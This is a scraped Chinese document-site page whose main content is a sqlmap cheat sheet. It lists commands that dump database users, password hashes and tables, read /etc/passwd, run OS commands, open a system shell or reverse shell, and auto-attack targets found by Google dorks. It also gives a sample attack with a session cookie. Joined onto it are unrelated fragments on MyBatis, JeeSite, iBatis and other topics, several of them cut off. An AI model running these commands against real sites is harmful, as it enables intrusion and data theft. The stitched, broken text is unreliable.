搜档网
当前位置:搜档网 › sqlmap使用手记

sqlmap使用手记

sqlmap使用手记
sqlmap使用手记

测试许多款sql注入工具最终还是发现sqlmap最为强悍谁用谁知道!

赶紧抛弃掉手上一大堆sql注入工具吧:)

测试环境:ubuntu10.10&windows7(x64)sqlmap/1.0-dev(r4405)Python2.7.2

*高版本python可能导致sqlmap报错!

*如使用过程中出错请使用下面最近更新的稳定版本:

https://www.sodocs.net/doc/ac17363999.html,/c0adthmqf1

更新升级:

sqlmap-update

svn checkout https://https://www.sodocs.net/doc/ac17363999.html,/sqlmap/trunk/sqlmap sqlmap-dev

帮助:

sqlmap-h

官方最新文档:https://www.sodocs.net/doc/ac17363999.html,/doc/README.html

******************基本步骤***************

sqlmap-u"http://url/news?id=1"--current-user#获取当前用户名称

sqlmap-u"https://www.sodocs.net/doc/ac17363999.html,/news?id=1"--current-db#获取当前数据库名称

sqlmap-u"https://www.sodocs.net/doc/ac17363999.html,/news?id=1"--tables-D"db_name"#列表名

sqlmap-u"http://url/news?id=1"--columns-T"tablename"users-D"db_name"-v0#列字段sqlmap-u"http://url/news?id=1"--dump-C"column_name"-T"table_name"-D

"db_name"-v0#获取字段内容

******************信息获取******************

sqlmap-u"http://url/news?id=1"--smart--level3--users#smart智能level执行测试等级

sqlmap-u"http://url/news?id=1"--dbms"Mysql"--users#dbms指定数据库类型

sqlmap-u"http://url/news?id=1"--users#列数据库用户

sqlmap-u"http://url/news?id=1"--dbs#列数据库

sqlmap-u"http://url/news?id=1"--passwords#数据库用户密码

sqlmap-u"http://url/news?id=1"--passwords-U root-v0#列出指定用户数据库密码sqlmap-u"http://url/news?id=1"--dump-C"password,user,id"-T"tablename"-D"db_name"--start1--stop20#列出指定字段,列出20条

sqlmap-u"http://url/news?id=1"--dump-all-v0#列出所有数据库所有表

sqlmap-u"http://url/news?id=1"--privileges#查看权限

sqlmap-u"http://url/news?id=1"--privileges-U root#查看指定用户权限

sqlmap-u"http://url/news?id=1"--is-dba-v1#是否是数据库管理员

sqlmap-u"http://url/news?id=1"--roles#枚举数据库用户角色

sqlmap-u"http://url/news?id=1"--udf-inject#导入用户自定义函数(获取系统权限!)sqlmap-u"http://url/news?id=1"--dump-all--exclude-sysdbs-v0#列出当前库所有表sqlmap-u"http://url/news?id=1"--union-cols#union查询表记录

sqlmap-u"http://url/news?id=1"--cookie"COOKIE_VALUE"#cookie注入

sqlmap-u"http://url/news?id=1"-b#获取banner信息

sqlmap-u"http://url/news?id=1"--data"id=3"#post注入

sqlmap-u"http://url/news?id=1"-v1-f#指纹判别数据库类型

sqlmap-u"http://url/news?id=1"--proxy"http://127.0.0.1:8118"#代理注入

sqlmap-u"http://url/news?id=1"--string"STRING_ON_TRUE_PAGE"#指定关键词

sqlmap-u"http://url/news?id=1"--sql-shell#执行指定sql命令

sqlmap-u"http://url/news?id=1"--file/etc/passwd

sqlmap-u"http://url/news?id=1"--os-cmd=whoami#执行系统命令

sqlmap-u"http://url/news?id=1"--os-shell#系统交互shell

sqlmap-u"http://url/news?id=1"--os-pwn#反弹shell

sqlmap-u"http://url/news?id=1"--reg-read#读取win系统注册表

sqlmap-u"http://url/news?id=1"--dbs-o"sqlmap.log"#保存进度

sqlmap-u"http://url/news?id=1"--dbs-o"sqlmap.log"--resume#恢复已保存进度sqlmap-g"google语法"--dump-all--batch#google搜索注入点自动跑出所有字段攻击实例:

sqlmap-u"http://url/news?id=1&Submit=Submit"--cookie="PHPSESSID=41aa833e6d0d 28f489ff1ab5a7531406"--string="Surname"--dbms=mysql--users--password

***********安装最新版本*************

ubuntu通过apt-get install安装的sqlmap版本为0.6

我们通过svn来安装为最新 1.0版

sudo svn checkout https://https://www.sodocs.net/doc/ac17363999.html,/sqlmap/trunk/sqlmap sqlmap-dev

安装的位置为:/home/当前用户/sqlmap-dev/sqlmap.py

直接执行/home/当前用户/sqlmap-dev/sqlmap.py--version

这样很不方便我们可以设置.bashrc文件

sudo vim/home/当前用户/.bashrc

#任意位置加上:

alias sqlmap='python/home/seclab/sqlmap-dev/sqlmap.py'

该环境变量只对当前用户有效

如果想对所有用户有效可设置全局编辑下面的文件

vim/etc/profile

同样加上:

alias sqlmap='python/home/seclab/sqlmap-dev/sqlmap.py'

重启生效

******************windows7(x64)sqlmap install(SVN)************ https://www.sodocs.net/doc/ac17363999.html,/getit/安装python*修改环境变量

https://www.sodocs.net/doc/ac17363999.html,/en/download安装windows svn client(可省略)

svn checkout https://https://www.sodocs.net/doc/ac17363999.html,/sqlmap/trunk/sqlmap sqlmap-dev安装sqlmap 当然也可以直接装好python环境然后下载官方最新测试的稳定版

https://www.sodocs.net/doc/ac17363999.html,/c0adthmqf1

传智播客mybatis课堂笔记

mybatis 第一天mybatis的基础知识 课程安排: mybatis和springmvc通过订单商品案例驱动 第一天:基础知识(重点,内容量多) 对原生态jdbc程序(单独使用jdbc开发)问题总结 mybatis框架原理(掌握) mybatis入门程序 用户的增、删、改、查 mybatis开发dao两种方法: 原始dao开发方法(程序需要编写dao接口和dao实现类)(掌握) mybaits的mapper接口(相当于dao接口)代理开发方法(掌握)mybatis配置文件SqlMapConfig.xml mybatis核心: mybatis输入映射(掌握) mybatis输出映射(掌握) mybatis的动态sql(掌握) 第二天:高级知识 订单商品数据模型分析 高级结果集映射(一对一、一对多、多对多) mybatis延迟加载 mybatis查询缓存(一级缓存、二级缓存) mybaits和spring进行整合(掌握) mybatis逆向工程 1对原生态jdbc程序中问题总结 1.1环境 java环境:jdk1.7.0_72 eclipse:indigo mysql:5.1

1.2创建mysql数据 导入下边的脚本: sql_table.sql:记录表结构 sql_data.sql:记录测试数据,在实际企业开发中,最后提供一个初始化数据脚本 1.3jdbc程序 使用jdbc查询mysql数据库中用户表的记录。 创建java工程,加入jar包: 数据库驱动包(mysql5.1) 上边的是mysql驱动。 下边的是oracle的驱动。 程序代码: 1.4问题总结 1、数据库连接,使用时就创建,不使用立即释放,对数据库进行频繁连接开启和关闭,造成数据库资源浪费,影响数据库性能。 设想:使用数据库连接池管理数据库连接。 2、将sql语句硬编码到java代码中,如果sql 语句修改,需要重新编译java代码,不利于

五大著名免费SQL注入漏洞扫描工具

大量的现代企业采用Web应用程序与其客户无缝地连接到一起,但由于不正确的编码,造成了许多安全问题。Web应用程序中的漏洞可使黑客获取对敏感信息(如个人数据、登录信息等)的直接访问。 Web应用程序准许访问者提交数据,并可通过互联网从数据库中检索数据。而数据库是多数Web应用程序的心脏。数据库维持着Web应用程序将特定内容交给访问者的数据,Web应用程序在将信息交给客户、供应商时,也从数据库取得数据。 SQL注入攻击是最为常见的Web应用程序攻击技术,它会试图绕过SQL命令。在用户输入没有“净化”时,如果执行这种输入便会表现出一种SQL注入漏洞。 检查SQL注入漏洞主要涉及到两方面,一是审计用户的Web应用程序,二是通过使用自动化的SQL注入扫描器执行审记的最佳方法。在此,笔者罗列了一些对Web应用程序开发人员和专业的安全审计人员有价值的SQL注入扫描程序。 一、SQLIer SQLIer可以找到网站上一个有SQL注入漏洞的URL,并根据有关信息来生成利用SQL注入漏洞,但它不要求用户的交互。通过这种方法,它可以生成一个UNION SELECT查询,进而可以强力攻击数据库口令。这个程序在利用漏洞时并不使用引号,这意味着它可适应多种网站。 SQLIer通过“true/false”SQL注入漏洞强力口令。借助于“true/false” SQL注入漏洞强力口令,用户是无法从数据库查询数据的,只能查询一个可返回“true”、“false”值的语句。 据统计,一个八个字符的口令(包括十进制ASCII代码的任何字符)仅需要大约1分钟即可破解。 其使用语法如下,sqlier [选项] [URL] 。其选项如下: -c :[主机] 清除主机的漏洞利用信息 -s :[秒]在网页请求之间等待的秒数 -u:[用户名]从数据库中强力攻击的用户名,用逗号隔开。 -w:[选项]将[选项]交由wget 此外,此程序还支持猜测字段名,有如下几种选择: --table-names [表格名称]:可进行猜测的表格名称,用逗号隔开。 --user-fields[用户字段]:可进行猜测的用户名字段名称,用逗号隔开。 --pass-fields [口令字段]:可进行猜测的口令字段名称,用逗号隔开。 下面说一下其基本用法: 例如,假设在下面的URL中有一个SQL注入漏洞: https://www.sodocs.net/doc/ac17363999.html,/sqlihole.php?id=1 我们运行下面这个命令: sqlier -s 10 https://www.sodocs.net/doc/ac17363999.html,/sqlihole.php?id=1从数据库中得到足够的信息,以利用其口令,其中的数字“10”表示要在每次查询之间等待10秒钟。 如果表格、用户名字段、口令字段名猜测得正确,那么漏洞利用程序会把用户名交付查询,准备从数据库中强力攻击口令。 sqlier -s 10 https://www.sodocs.net/doc/ac17363999.html, -u BCable,administrator,root,user4 然而,如果内建的字段/表格名称没有猜中正确的字段名,用户就可以执行: sqlier -s 10 https://www.sodocs.net/doc/ac17363999.html, --table-names [table_names] --user-fields [user_fields] --pass-fields [pass_fields]

sqlmap使用手册

详解强大的SQL注入工具——SQLMAP Akast [N.S.T] 1. 前言 Windows下的注入工具好的又贵,免费的啊D、明小子等又不好用,我们根本没必要花 时间去找什么破解的havij、pangolin什么的,特别是破解的工具很可能被绑了木马。其实Linux下的注入工具也是非常强大的,不过分的说,可以完全取代Windows下面的所有注入工具。 就如backtrack系统里面就有非常丰富的注入工具,对MSSQL、MYSQL、oracle等各种 数据库的应有尽有了,而且这些工具都是免费的,并且是开放源代码的,我们还可以用来修改为合适自己使用的注入工具。 本文给大家介绍的SqlMap是一个开放源码的渗透测试工具,它可以自动探测和利用SQL 注入漏洞来接管数据库服务器。它配备了一个强大的探测引擎,为最终渗透测试人员提供很多猥琐的功能,可以拖库,可以访问底层的文件系统,还可以通过带外连接执行操作系统上的命令。 2. SQLMAP命令详解 为了方便使用我把sqlmap的选项都翻译出来了,当然可能会存在一些不恰当的地方, 请大家指出,可以给我发邮件:akast@https://www.sodocs.net/doc/ac17363999.html,。如果我有时间会把这个工具出个中文版。 Options(选项): --version 显示程序的版本号并退出 -h, --help 显示此帮助消息并退出 -v VERBOSE 详细级别:0-6(默认为1) Target(目标): 以下至少需要设置其中一个选项,设置目标URL。 -d DIRECT 直接连接到数据库。 -u URL, --url=URL 目标URL。 -l LIST 从Burp或WebScarab代理的日志中解析目标。 -r REQUESTFILE 从一个文件中载入HTTP请求。 -g GOOGLEDORK 处理Google dork的结果作为目标URL。 -c CONFIGFILE 从INI配置文件中加载选项。 Request(请求):: 这些选项可以用来指定如何连接到目标URL。 --data=DATA 通过POST发送的数据字符串 --cookie=COOKIE HTTP Cookie头 --cookie-urlencode URL 编码生成的cookie注入 --drop-set-cookie 忽略响应的Set - Cookie头信息

Mybatis学习笔记

Mybatis 学习笔记 1. mybatis 是什么? ● mybatis 是一个持久层的框架,是apache 下的顶级项目。 ● mybatis 让程序将主要精力放在sql 上,通过mybatis 提供的映射方式,自由灵活生成(半自动化, 大部分需要程序员编写sql )满足需要sql 语句。 ● mybatis 可以将向 preparedStatement 中的输入参数自动进行输入映射,将查询结果集灵活映射成java 对象。(输出映射) 2. mybatis 框架

3. 一个原始查询代码 4. “主键”生成及返回 mysql自增主键 a)执行insert提交之前自动生成一个自增主键。通过mysql函数LAST_INSERT_ID()获取到刚插入记录 的自增主键。是insert之后调用此函数。

?mysql UUID主键 使用mysql的uuid()函数生成主键,需要修改表中id字段类型为string,长度设置成35位。 执行思路:先通过uuid()查询到主键,将主键输入到sql语句中。执行uuid()语句顺序相对于insert语句之前执行。 ?Oracle序列主键 SELECT 序列名.nextval() insert into user(id,username,birthday,sex,address) value(#{id},#{username},#{birthday},#{sex},#{address}) 5. 一个删除用户的代码 主要注意:https://www.sodocs.net/doc/ac17363999.html,mit()提交事务操作。

笔记2(通路管理)

这个界面可以参考: D:\BTOPS2012\Client\https://www.sodocs.net/doc/ac17363999.html,erManage\ControlChannel.cs,FormChannel.cs 1.VS2010版做repositoryItemLookUpEdit,有两种方法可参考。 2.添加和删除从表(小加减) 一、任务在(权限配置管理》通路管理)中 1.主表:SYS_CHANNEL通路定义表 从表:SYS_CHANNEL_CONFIG通路配置表 2.参照“单证费目清单”:在(费收管理系统》费收代码维护》单证费目清单)中 3.界面控制在:D:\BTOPS2012\Client\https://www.sodocs.net/doc/ac17363999.html,erManage\UserManageControl.cs中 4.可参照:笔记(码头管理)一、1-7 二、4.26 1.控件“layoutControl”包含: layoutControl、layoutControlGroup; 其中的Item是来自外界的控件,直接拖进去的,大小无法修改,各控件位置可调换,都类似于固定存在的Dock的“Fill”属性。 已解决: 2.问题:界面:菜单栏的隔断线如何做? 回答:先添加好各菜单按钮,然后选择某一按钮右击:"Begin a Group" 三、4.27 1.命名空间中出现红色波浪线:“缺少程序集引用”: *在项目的引用中添加引用。 *如果找不到该引用,就在项目Infrastructure\https://www.sodocs.net/doc/ac17363999.html,mon中找到该名称重新生成一下,若还是没有可添加项,在别处找到一样的复制路径,再“浏览”“.DLL”文件。 2.引用出现:感叹号,重新引用。 3.报错:“命名空间被当作类型来使用”:把命名空间添加到类型前。 “兰色体是某某之间不明确的引用”:选择一个,添加到兰色体前。 4.死循环: 当生成成功而运行出现死循环时,要检查Bll文件中是否重复创建了自身的对象,改成

jeesite 说明文档-3.内置组件的应用

第3章内置组件的应用 作者:ThinkGem 更新日期:2014-01-05 1.常用组件 1.1.布局组件 布局文件配置: / jeesite/src/main/webapp/WEB-INF/decorators.xml 默认布局文件: / jeesite/src/main/webapp/WEB-INF/views/layouts/default.jsp 非公共,自己建立的布局文件: / jeesite/src/main/webapp/WEB-INF/views/模块路径/layouts/布局文件.jsp 使用布局文件: JSP的head里添加:

1.2.用户工具UserUtils.java fns.tld 应用场景:在java文件或jsp页面上,获取当前用户相关信息 1.获取当前用户: 1)UserUtils.getUser(); 2)entity.currentUser() 3)${fns:getUser()} 2.获取当前用户部门: 1)UserUtils.getOfficeList() 2)${fns:getOfficeList()} 3.获取当前用户区域: 1)UserUtils.getAreaList() 2)${fns:getAreaList()} 4.获取当前用户菜单: 1)UserUtils.getMenuList() 2)${fns:getMenuList()} 5.获取当前用户缓存: 1)UserUtils.getCache(key); 2)${fns:getCache(cacheName, defaultValue)} 6.设置当前用户缓存: 1)UserUtils.putCache(key); 1.3.全局缓存CacheUtils.java 应用场景:系统字典 1.设置应用程序缓存:CacheUtils.put(key); 2.获取应用程序缓存:CacheUtils.get(key); 1.4.字典工具DictUtils.java 应用场景:系统全局固定的字典数据,java或jsp中获取字典相关数据。

ibatis使用总结

ibatis使用总结 SqlMap的配置是iBatis中应用的核心。这部分任务占据了iBatis开发的70的工作量。 1、命名空间: ,在此空间外要引用此空间的元素,则需要加上命名空间名。 2、实体的别名: 如果有用到的全名的地方,可以用别名代替,受命名空间约束。 3、插入操作 对于自增主键的表,插入可以不配置插入的主键列。否则是必须的。 4、获取主键 插入语句之前配置:主要是针对Sequence主键而言,插入前必须指定一个主键值给要插入的记录。Oracle、DB2亦如此,方法是在插入语句标签之前配置上: SELECT SEQ_TEST.NEXTVAL FROM DUAL insert into .... ........ 插入语句之后配置:主要是针对自增主键的表而言,这类表在插入时不需要主键,而是在插入过程自动获取一个自增的主键。比如MySQL SELECT LAST_INSERT_ID() insert into .... ........ 当然,是否需要配置根据情况,只要能保证记录有主键即可。一旦配置了,就可以在执行插入操作时获取到新增记录的主键。 6、SQL入参parameterClass 插入语句入参:parameterClass="类别名" 来设定。 查询语句入参:可以设定类别名,也可以设定为map,也可以设定为iBatis支持的原生类型(比如string、int、long等),当只有一个原生类型入参时,使用#value#来引用,这个value 是不是关键字,可变。比如: